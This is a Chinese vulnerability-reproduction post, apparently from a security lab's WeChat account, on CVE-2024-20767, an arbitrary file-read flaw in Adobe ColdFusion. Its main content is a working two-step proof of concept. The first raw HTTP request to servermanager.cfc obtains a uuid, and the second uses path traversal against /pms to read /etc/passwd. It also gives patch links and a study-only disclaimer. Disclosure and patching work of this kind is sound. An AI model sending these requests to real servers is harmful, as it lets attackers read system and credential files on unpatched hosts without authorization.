网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Adobe ColdFusion是美国奥多比(Adobe)公司的一套快速应用程序开发平台。该平台包括集成开发环境和脚本语言。
Adobe ColdFusion 2023.6, 2021.12 版本及之前版本存在访问控制错误漏洞,该漏洞源于存在不正确的访问控制漏洞,可能导致任意文件系统读取。
Adobe ColdFusion 2023.6, 2021.12 版本及之前版本
1.访问漏洞环境
2.对漏洞进行复现
POC (GET)
漏洞复现
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: close
获取uuid
执行文件读取/etc/passwd
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: closeuuid: 33a347c8-c5ea-4a08-9b40-d83e531cad80
3.nuclei工具测试(漏洞存在)
4.python工具测试
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://helpx.adobe.com/security/products/coldfusion/apsb24-14.htmlhttps://github.com/yoryio/CVE-2024-20767?tab=readme-ov-filehttps://jeva.cc/2973.html
原文始发于微信公众号(弥天安全实验室):【成功复现】Adobe ColdFusion任意文件读取漏洞(CVE-2024-20767)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论